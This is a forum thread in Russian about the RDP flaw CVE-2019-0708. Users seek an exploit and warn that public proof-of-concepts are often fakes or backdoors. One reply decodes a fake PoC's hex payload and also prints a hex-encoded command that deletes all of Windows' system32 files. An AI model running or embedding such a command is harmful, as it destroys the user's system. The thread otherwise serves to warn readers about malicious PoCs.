• XSS.stack #1 – первый литературный журнал от юзеров форума

CVE-2019-0708 | Remote Desktop Services RCE

tabac

CPU register
Пользователь
Регистрация
30.09.2018
Сообщения
1 610
Решения
1
Реакции
3 332
CVE-2019-0708 | Remote Desktop Services RCE

Удаленное выполнение произвольного кода в протоколе RDP. Стало известно об опасной уязвимости в протоколе RDP: корпорация Microsoft подготовила экстренный патч для уязвимости с идентификатором CVE-2019-0708, позволяющей выполнить произвольный код на целевой системе.

Уязвимость удаленного выполнения кода существует в службах удаленных рабочих столов (ранее они назывались службами терминалов), когда злоумышленник, не прошедший проверку подлинности, подключается к целевой системе с помощью RDP и отправляет специально созданные запросы. Эта уязвимость использует предаутентификацию и не требует взаимодействия с пользователем. Злоумышленник, успешно воспользовавшийся данной уязвимостью, может выполнить произвольный код в целевой системе.

The vulnerability (CVE-2019-0708) resides in the “remote desktop services” component built into supported versions of Windows, including Windows 7, Windows Server 2008 R2, and Windows Server 2008. It also is present in computers powered by Windows XP and Windows 2003, operating systems for which Microsoft long ago stopped shipping security updates.

Чтобы воспользоваться уязвимостью, злоумышленнику необходимо отправить специально созданный запрос службе удаленных рабочих столов целевых систем через RDP.

Интересным является тот факт, что эту или схожую уязвимость продавали в «даркнете» как минимум с сентября прошлого года.


pre-auth, баг ОЧЕНЬ СЕРЬЕЗНЫЙ

кто-то уже встречал poc? или готовый эксп?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
В twitter'e много шлака постят. Я за сегодня кучу бекдоров нашел. В том числе с кобальтстрайком и прочем шлаком. Вайтехеты рофлят. Не видитесь. 9,8 по скопу, к тому же вряд ли кто будет постить такой сплойт. Он очень ценный.
 
В twitter'e много шлака постят. Я за сегодня кучу бекдоров нашел. В том числе с кобальтстрайком и прочем шлаком. Вайтехеты рофлят. Не видитесь. 9,8 по скопу, к тому же вряд ли кто будет постить такой сплойт. Он очень ценный.
Надо быть откровенно дауном чтобы запостить
 
причем тут питон ?
декодируй переменную sc=
и все будет видно, что за шелл там.

хз, у меня не работает ничего.
Потому что на нем код написан, а в переменной что угодно может быть
Лол, очевидно же, не пугайте меня :D
 
Как чекнуть код? Все просто. Находим репу с cve (например тот же https://github.com/k8gege/CVE-2019-0708, что был выше), берем пейлоад:
Код:
\x6D\x73\x68\x74\x61\x20\x76\x62\x73\x63\x72\x69\x70\x74\x3A\x6D\x73\x67\x62\x6F\x78\x28\x22\x79\x6F\x75\x20\x70\x6C\x61\x79\x20\x62\x61\x73\x6B\x65\x74\x62\x61\x6C\x6C\x20\x6C\x69\x6B\x65\x20\x63\x61\x69\x78\x75\x6B\x75\x6E\x21\x22\x2C\x36\x34\x2C\x22\x4B\x38\x67\x65\x67\x65\x3A\x22\x29\x28\x77\x69\x6E\x64\x6F\x77\x2E\x63\x6C\x6F\x73\x65\x29
прогоняем через любой HEX->ASCII (http://www.unit-conversion.info/texttools/hexadecimal/) и на выходе получаем:
Код:
mshta vbscript:msgbox("you play basketball like caixukun!",64,"K8gege:")(window.close)

Так что чекайте что там пейлоадится перед тем как запускать, а то можно напороться на что-то типа:
Код:
\x64\x65\x6c\x20\x2f\x71\x20\x2f\x66\x20\x63\x3a\x5c\x77\x69\x6e\x64\x6f\x77\x73\x5c\x73\x79\x73\x74\x65\x6d\x33\x32\x5c\x2a\x2e\x2a
дебилов-шутников так-то хватает
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх